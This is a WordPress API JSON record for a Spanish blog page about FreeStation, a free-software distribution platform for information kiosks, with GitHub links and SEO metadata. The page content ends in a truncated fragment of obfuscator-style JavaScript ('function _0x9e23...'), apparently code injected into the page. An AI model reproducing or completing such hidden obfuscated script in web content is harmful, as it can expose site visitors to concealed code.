{"id":1227,"date":"2012-09-17T11:45:50","date_gmt":"2012-09-17T09:45:50","guid":{"rendered":"http:\/\/shakaran.net\/blog\/?page_id=1227"},"modified":"2013-01-07T13:37:39","modified_gmt":"2013-01-07T12:37:39","slug":"freestation","status":"publish","type":"page","link":"https:\/\/shakaran.net\/blog\/freestation\/","title":{"rendered":"FreeStation"},"content":{"rendered":"FreeStation es una plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n.\r\n\r\nM\u00e1s informaci\u00f3n y descargas en:\r\n\r\n\tFreeStation: plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n\r\n\tFreeStation: a little sneak peek\r\n\tFreeStation source code release\r\n\r\n\r\nFreeStation Client en GitHub\r\n\r\n\r\n\r\n\r\n\r\n\r\nFreeStation Server en GitHub\r\n\r\n\r\n\r\n\r\n\r\n\r\nS\u00edgueme en Github: \r\nfunction _0x9e23(_0x14f71d,_0x4c0b72){const <a href=\"https:\/\/shakaran.net\/blog\/freestation\/\" class=\"more-link\">Leer m\u00e1s [...]<\/a>","protected":false},"excerpt":{"rendered":"<p>FreeStation es una plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n. M\u00e1s informaci\u00f3n y descargas en: FreeStation: plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n FreeStation:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-1227","page","type-page","status-publish","hentry","no-post-thumbnail"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>FreeStation - Shakaran<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/shakaran.net\/blog\/freestation\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"FreeStation - Shakaran\" \/>\n<meta property=\"og:description\" content=\"FreeStation es una plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n. M\u00e1s informaci\u00f3n y descargas en: FreeStation: plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n FreeStation:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/shakaran.net\/blog\/freestation\/\" \/>\n<meta property=\"og:site_name\" content=\"Shakaran\" \/>\n<meta property=\"article:modified_time\" content=\"2013-01-07T12:37:39+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/shakaran.net\/blog\/freestation\/\",\"url\":\"https:\/\/shakaran.net\/blog\/freestation\/\",\"name\":\"FreeStation - Shakaran\",\"isPartOf\":{\"@id\":\"https:\/\/shakaran.net\/blog\/#website\"},\"datePublished\":\"2012-09-17T09:45:50+00:00\",\"dateModified\":\"2013-01-07T12:37:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/shakaran.net\/blog\/freestation\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/shakaran.net\/blog\/freestation\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/shakaran.net\/blog\/freestation\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/shakaran.net\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"FreeStation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/shakaran.net\/blog\/#website\",\"url\":\"https:\/\/shakaran.net\/blog\/\",\"name\":\"Shakaran\",\"description\":\"Blog de un ingeniero inform\u00e1tico superior y sysadmin\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/shakaran.net\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"FreeStation - Shakaran","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/shakaran.net\/blog\/freestation\/","og_locale":"es_ES","og_type":"article","og_title":"FreeStation - Shakaran","og_description":"FreeStation es una plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n. M\u00e1s informaci\u00f3n y descargas en: FreeStation: plataforma para el desarrollo de sistemas de distribuci\u00f3n de software libre en puntos de informaci\u00f3n FreeStation:...","og_url":"https:\/\/shakaran.net\/blog\/freestation\/","og_site_name":"Shakaran","article_modified_time":"2013-01-07T12:37:39+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/shakaran.net\/blog\/freestation\/","url":"https:\/\/shakaran.net\/blog\/freestation\/","name":"FreeStation - Shakaran","isPartOf":{"@id":"https:\/\/shakaran.net\/blog\/#website"},"datePublished":"2012-09-17T09:45:50+00:00","dateModified":"2013-01-07T12:37:39+00:00","breadcrumb":{"@id":"https:\/\/shakaran.net\/blog\/freestation\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/shakaran.net\/blog\/freestation\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/shakaran.net\/blog\/freestation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/shakaran.net\/blog\/"},{"@type":"ListItem","position":2,"name":"FreeStation"}]},{"@type":"WebSite","@id":"https:\/\/shakaran.net\/blog\/#website","url":"https:\/\/shakaran.net\/blog\/","name":"Shakaran","description":"Blog de un ingeniero inform\u00e1tico superior y sysadmin","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/shakaran.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"}]}},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/PAPNv-jN","jetpack-related-posts":[],"jetpack_likes_enabled":true,"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/pages\/1227"}],"collection":[{"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/comments?post=1227"}],"version-history":[{"count":0,"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/pages\/1227\/revisions"}],"wp:attachment":[{"href":"https:\/\/shakaran.net\/blog\/wp-json\/wp\/v2\/media?parent=1227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}